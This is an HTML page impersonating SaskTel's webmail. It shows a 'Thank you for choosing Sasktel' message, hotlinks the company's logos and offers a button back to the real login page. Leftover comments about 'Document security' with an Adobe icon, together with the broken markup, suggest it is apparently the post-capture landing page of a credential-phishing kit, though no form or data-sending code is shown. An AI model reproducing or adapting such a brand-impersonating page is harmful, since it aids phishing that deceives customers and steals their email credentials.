<!DOCTYPE html>
<html>
<link rel="shortcut icon" href="https://media.glassdoor.com/sql/33731/sasktel-squarelogo.png">
<header>
<img "left" alt="S"src="https://webmail.sasktel.net/0ace5a9/branding/hid-2370/custompages/images/sask_tel_logo.png" width="200" height="50">
 </head>
	<meta charset="UTF-8">
	<title>Login - Webmail 7.0</title>
	<link href="style.css" rel="stylesheet">
</head>
<body>

<p>
<p>
<p>
<p>
<div class="login-page">
<div class="form">
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<div style="text-align:center;">
<br>
<br>
<div style="background-color:Royale Blue">
<h1 style="color:black;"> Thank you for choosing Sasktel</h5>
<h2 style="color:black;"> You can relax knowing that we maintain our servers, so you can benefit from reliable email without management hassles.</h5>
</div>
<p>
<br>
<a href="https://webmail.sasktel.net/#/login"><button>Go Back to <span style='font-size:17px;'>&#8680;</span> INBOX </button>
<br>
<p>
<br>
<br>
   <img "left" alt="Sasktel"src="https://www3.bellmts.ca/file_source/mts.ca/Static_Files/Support/Security_icon.jpg" width="50" height="50">
<br>
</div>
<p>
<br>
<br>
<br>
<br>
<br>
<br>
	  <!-- <p style="color:gold;">Document security</p> -->
	  <!-- <img align="top" alt=" Adobe" src="https://www.adobe.com/content/dam/cc/icons/reader_appicon_64_grayscale.svg" width="65" height="50"> -->
	  <!-- <h4 style="color:gold;">256-bit SSL encryption, OAuth 2.0 authentication, encrypted storage.</p> -->
</p>
  
</form>
</form>
  </p>
</form>
		
</div>		
</style>
</head>
<body>

<h2></h2>
<p></p>

<div class="footer">
<img align="left" alt="Sasktel" src="https://webmail.sasktel.net/0ace5a9/branding/hid-2370/custompages/images/logo_footer.png" width="150" height="50"><h4 <span class="cable-only">© <script>document.write(new Date().getFullYear())</script> SaskTel and its licensors. All rights reserved.</span>
</div>
<div class="form">